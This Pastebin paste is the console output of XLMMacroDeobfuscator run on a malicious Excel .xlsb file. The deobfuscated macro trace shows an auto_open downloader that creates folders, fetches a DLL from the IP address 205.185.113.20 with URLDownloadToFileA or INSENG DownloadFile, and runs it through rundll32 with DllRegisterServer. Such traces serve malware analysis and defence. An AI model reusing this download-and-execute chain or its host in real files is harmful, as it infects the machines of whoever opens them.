Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- C:\Users\user\AppData\Local\Programs\Python\Python36-32\python.exe C:/Users/user/Downloads/last/XLMMacroDeobfuscator_new/XLMMacroDeobfuscator/deobfuscator.py -f C:\Users\user\Downloads\7c309387537899f2c0989dcdcc65e21bff85588343800fbbee0d8d36f7aeb155.xlsb
- _ _______
- |\ /|( \ ( )
- ( \ / )| ( | () () |
- \ (_) / | | | || || |
- ) _ ( | | | |(_)| |
- / ( ) \ | | | | | |
- ( / \ )| (____/\| ) ( |
- |/ \|(_______/|/ \|
- ______ _______ _______ ______ _______ _______ _______ _______ _________ _______ _______
- ( __ \ ( ____ \( ___ )( ___ \ ( ____ \|\ /|( ____ \( ____ \( ___ )\__ __/( ___ )( ____ )
- | ( \ )| ( \/| ( ) || ( ) )| ( \/| ) ( || ( \/| ( \/| ( ) | ) ( | ( ) || ( )|
- | | ) || (__ | | | || (__/ / | (__ | | | || (_____ | | | (___) | | | | | | || (____)|
- | | | || __) | | | || __ ( | __) | | | |(_____ )| | | ___ | | | | | | || __)
- | | ) || ( | | | || ( \ \ | ( | | | | ) || | | ( ) | | | | | | || (\ (
- | (__/ )| (____/\| (___) || )___) )| ) | (___) |/\____) || (____/\| ) ( | | | | (___) || ) \ \__
- (______/ (_______/(_______)|/ \___/ |/ (_______)\_______)(_______/|/ \| )_( (_______)|/ \__/
- XLMMacroDeobfuscator(v0.1.5) - https://github.com/DissectMalware/XLMMacroDeobfuscator
- File: C:\Users\user\Downloads\7c309387537899f2c0989dcdcc65e21bff85588343800fbbee0d8d36f7aeb155.xlsb
- Unencrypted xlsb file
- [Loading Cells]
- auto_open: auto_open->WSH!$IM$497
- [Starting Deobfuscation]
- CELL:IM497 , FullEvaluation , $E$456()
- CELL:E456 , FullEvaluation , SET.NAME(lynumxcbqnhz,http://205.185.113.20/cXQT5g)
- CELL:E457 , FullEvaluation , SET.NAME(wspntpbftoqz,$BB$54)
- CELL:E458 , FullEvaluation , $GZ$12()
- CELL:GZ12 , FullEvaluation , FORMULA(http://205.185.113.20/cXQT5g,$BB$54)
- CELL:E459 , FullEvaluation , RUN(WSH!GV439)
- CELL:GV439 , FullEvaluation , SET.NAME(lynumxcbqnhz,C:\nMEzMcr\NBKhcGI\zalfxuR.dll,DllRegisterServer)
- CELL:GV440 , FullEvaluation , SET.NAME(wspntpbftoqz,$AQ$173)
- CELL:GV441 , FullEvaluation , $GZ$12()
- CELL:GZ12 , FullEvaluation , FORMULA(C:\nMEzMcr\NBKhcGI\zalfxuR.dll,DllRegisterServer,$AQ$173)
- CELL:GV442 , FullEvaluation , RUN(WSH!IL434)
- CELL:IL434 , FullEvaluation , SET.NAME(lynumxcbqnhz,C:\nMEzMcr\NBKhcGI\zalfxuR.dll)
- CELL:IL435 , FullEvaluation , SET.NAME(wspntpbftoqz,$HR$332)
- CELL:IL436 , FullEvaluation , $GZ$12()
- CELL:GZ12 , FullEvaluation , FORMULA(C:\nMEzMcr\NBKhcGI\zalfxuR.dll,$HR$332)
- CELL:IL437 , FullEvaluation , RUN(WSH!R272)
- CELL:R272 , FullEvaluation , SET.NAME(lynumxcbqnhz,URLMON)
- CELL:R273 , FullEvaluation , SET.NAME(wspntpbftoqz,$BE$21)
- CELL:R274 , FullEvaluation , $GZ$12()
- CELL:GZ12 , FullEvaluation , FORMULA(URLMON,$BE$21)
- CELL:R275 , FullEvaluation , RUN(WSH!AQ366)
- CELL:AQ366 , FullEvaluation , SET.NAME(lynumxcbqnhz,URLDownloadToFileA)
- CELL:AQ367 , FullEvaluation , SET.NAME(wspntpbftoqz,$CK$8)
- CELL:AQ368 , FullEvaluation , $GZ$12()
- CELL:GZ12 , FullEvaluation , FORMULA(URLDownloadToFileA,$CK$8)
- CELL:AQ369 , FullEvaluation , RUN(WSH!EM216)
- CELL:EM216 , FullEvaluation , SET.NAME(lynumxcbqnhz,JJCCJJ)
- CELL:EM217 , FullEvaluation , SET.NAME(wspntpbftoqz,$DF$227)
- CELL:EM218 , FullEvaluation , $GZ$12()
- CELL:GZ12 , FullEvaluation , FORMULA(JJCCJJ,$DF$227)
- CELL:EM219 , FullEvaluation , RUN(WSH!AB224)
- CELL:AB224 , FullEvaluation , SET.NAME(lynumxcbqnhz,Shell32)
- CELL:AB225 , FullEvaluation , SET.NAME(wspntpbftoqz,$AE$234)
- CELL:AB226 , FullEvaluation , $GZ$12()
- CELL:GZ12 , FullEvaluation , FORMULA(Shell32,$AE$234)
- CELL:AB227 , FullEvaluation , RUN(WSH!FR415)
- CELL:FR415 , FullEvaluation , SET.NAME(lynumxcbqnhz,ShellExecuteA)
- CELL:FR416 , FullEvaluation , SET.NAME(wspntpbftoqz,$Y$205)
- CELL:FR417 , FullEvaluation , $GZ$12()
- CELL:GZ12 , FullEvaluation , FORMULA(ShellExecuteA,$Y$205)
- CELL:FR418 , FullEvaluation , RUN(WSH!HX379)
- CELL:HX379 , FullEvaluation , SET.NAME(lynumxcbqnhz,JJCCCCJ)
- CELL:HX380 , FullEvaluation , SET.NAME(wspntpbftoqz,$IC$410)
- CELL:HX381 , FullEvaluation , $GZ$12()
- CELL:GZ12 , FullEvaluation , FORMULA(JJCCCCJ,$IC$410)
- CELL:HX382 , FullEvaluation , RUN(WSH!FM120)
- CELL:FM120 , FullEvaluation , SET.NAME(lynumxcbqnhz,Open)
- CELL:FM121 , FullEvaluation , SET.NAME(wspntpbftoqz,$BV$426)
- CELL:FM122 , FullEvaluation , $GZ$12()
- CELL:GZ12 , FullEvaluation , FORMULA(Open,$BV$426)
- CELL:FM123 , FullEvaluation , RUN(WSH!FB326)
- CELL:FB326 , FullEvaluation , SET.NAME(lynumxcbqnhz,regsvr32.exe)
- CELL:FB327 , FullEvaluation , SET.NAME(wspntpbftoqz,$GO$283)
- CELL:FB328 , FullEvaluation , $GZ$12()
- CELL:GZ12 , FullEvaluation , FORMULA(regsvr32.exe,$GO$283)
- CELL:FB329 , FullEvaluation , RUN(WSH!R419)
- CELL:R419 , FullEvaluation , SET.NAME(lynumxcbqnhz,rundll32.exe)
- CELL:R420 , FullEvaluation , SET.NAME(wspntpbftoqz,$AK$271)
- CELL:R421 , FullEvaluation , $GZ$12()
- CELL:GZ12 , FullEvaluation , FORMULA(rundll32.exe,$AK$271)
- CELL:R422 , FullEvaluation , RUN(WSH!IF482)
- CELL:IF482 , FullEvaluation , SET.NAME(lynumxcbqnhz,C:\nMEzMcr)
- CELL:IF483 , FullEvaluation , SET.NAME(wspntpbftoqz,$ED$307)
- CELL:IF484 , FullEvaluation , $GZ$12()
- CELL:GZ12 , FullEvaluation , FORMULA(C:\nMEzMcr,$ED$307)
- CELL:IF485 , FullEvaluation , RUN(WSH!FX105)
- CELL:FX105 , FullEvaluation , SET.NAME(lynumxcbqnhz,C:\nMEzMcr\NBKhcGI)
- CELL:FX106 , FullEvaluation , SET.NAME(wspntpbftoqz,$BY$47)
- CELL:FX107 , FullEvaluation , $GZ$12()
- CELL:GZ12 , FullEvaluation , FORMULA(C:\nMEzMcr\NBKhcGI,$BY$47)
- CELL:FX108 , FullEvaluation , RUN(WSH!AM67)
- CELL:AM67 , FullEvaluation , SET.NAME(lynumxcbqnhz,Kernel32)
- CELL:AM68 , FullEvaluation , SET.NAME(wspntpbftoqz,$AP$48)
- CELL:AM69 , FullEvaluation , $GZ$12()
- CELL:GZ12 , FullEvaluation , FORMULA(Kernel32,$AP$48)
- CELL:AM70 , FullEvaluation , RUN(WSH!HD278)
- CELL:HD278 , FullEvaluation , SET.NAME(lynumxcbqnhz,CreateDirectoryA)
- CELL:HD279 , FullEvaluation , SET.NAME(wspntpbftoqz,$DW$422)
- CELL:HD280 , FullEvaluation , $GZ$12()
- CELL:GZ12 , FullEvaluation , FORMULA(CreateDirectoryA,$DW$422)
- CELL:HD281 , FullEvaluation , RUN(WSH!FU460)
- CELL:FU460 , FullEvaluation , SET.NAME(lynumxcbqnhz,JCJ)
- CELL:FU461 , FullEvaluation , SET.NAME(wspntpbftoqz,$CC$99)
- CELL:FU462 , FullEvaluation , $GZ$12()
- CELL:GZ12 , FullEvaluation , FORMULA(JCJ,$CC$99)
- CELL:FU463 , FullEvaluation , RUN(WSH!IM53)
- CELL:IM53 , FullEvaluation , SET.NAME(lynumxcbqnhz,INSENG)
- CELL:IM54 , FullEvaluation , SET.NAME(wspntpbftoqz,$FX$188)
- CELL:IM55 , FullEvaluation , $GZ$12()
- CELL:GZ12 , FullEvaluation , FORMULA(INSENG,$FX$188)
- CELL:IM56 , FullEvaluation , RUN(WSH!EN497)
- CELL:EN497 , FullEvaluation , SET.NAME(lynumxcbqnhz,DownloadFile)
- CELL:EN498 , FullEvaluation , SET.NAME(wspntpbftoqz,$EC$116)
- CELL:EN499 , FullEvaluation , $GZ$12()
- CELL:GZ12 , FullEvaluation , FORMULA(DownloadFile,$EC$116)
- CELL:EN500 , FullEvaluation , RUN(WSH!Y5)
- CELL:Y5 , FullEvaluation , SET.NAME(lynumxcbqnhz,BCCJ)
- CELL:Y6 , FullEvaluation , SET.NAME(wspntpbftoqz,$EZ$466)
- CELL:Y7 , FullEvaluation , $GZ$12()
- CELL:GZ12 , FullEvaluation , FORMULA(BCCJ,$EZ$466)
- CELL:Y8 , FullEvaluation , RUN(WSH!EJ144)
- CELL:EJ144 , FullEvaluation , SET.NAME(lynumxcbqnhz,NIlBTnHC)
- CELL:EJ145 , FullEvaluation , SET.NAME(wspntpbftoqz,$HQ$304)
- CELL:EJ146 , FullEvaluation , $GZ$12()
- CELL:GZ12 , FullEvaluation , FORMULA(NIlBTnHC,$HQ$304)
- CELL:EJ147 , FullEvaluation , RUN(WSH!CJ205)
- CELL:CJ205 , FullEvaluation , SET.NAME(lynumxcbqnhz,VBKLJOys)
- CELL:CJ206 , FullEvaluation , SET.NAME(wspntpbftoqz,$IB$431)
- CELL:CJ207 , FullEvaluation , $GZ$12()
- CELL:GZ12 , FullEvaluation , FORMULA(VBKLJOys,$IB$431)
- CELL:CJ208 , FullEvaluation , RUN(WSH!BT60)
- CELL:BT60 , FullEvaluation , SET.NAME(lynumxcbqnhz,JnBzQTWO)
- CELL:BT61 , FullEvaluation , SET.NAME(wspntpbftoqz,$HZ$410)
- CELL:BT62 , FullEvaluation , $GZ$12()
- CELL:GZ12 , FullEvaluation , FORMULA(JnBzQTWO,$HZ$410)
- CELL:BT63 , FullEvaluation , $IM$498()
- CELL:IM498 , FullEvaluation , CALL("Kernel32","CreateDirectoryA","JCJ","C:\nMEzMcr",0)
- CELL:IM499 , FullEvaluation , CALL("Kernel32","CreateDirectoryA","JCJ","C:\nMEzMcr\NBKhcGI",0)
- CELL:IM501 , FullEvaluation , CALL("URLMON","URLDownloadToFileA","JJCCJJ",0,"http://205.185.113.20/cXQT5g","C:\nMEzMcr\NBKhcGI\zalfxuR.dll",0,0)
- CELL:IM503 , FullEvaluation , IF($IM$502<>0)
- CELL:IM504 , FullEvaluation , CALL("INSENG","DownloadFile","BCCJ","http://205.185.113.20/cXQT5g","C:\nMEzMcr\NBKhcGI\zalfxuR.dll",1)
- CELL:IM506 , FullEvaluation , END.IF
- CELL:IM508 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCCJ",0,"Open","rundll32.exe","C:\nMEzMcr\NBKhcGI\zalfxuR.dll,DllRegisterServer",0,0)
- CELL:IM511 , End , HALT()
- Files:
- [END of Deobfuscation]
- time elapsed: 1.2602179050445557
- Process finished with exit code 0
Add Comment
Please, Sign In to add comment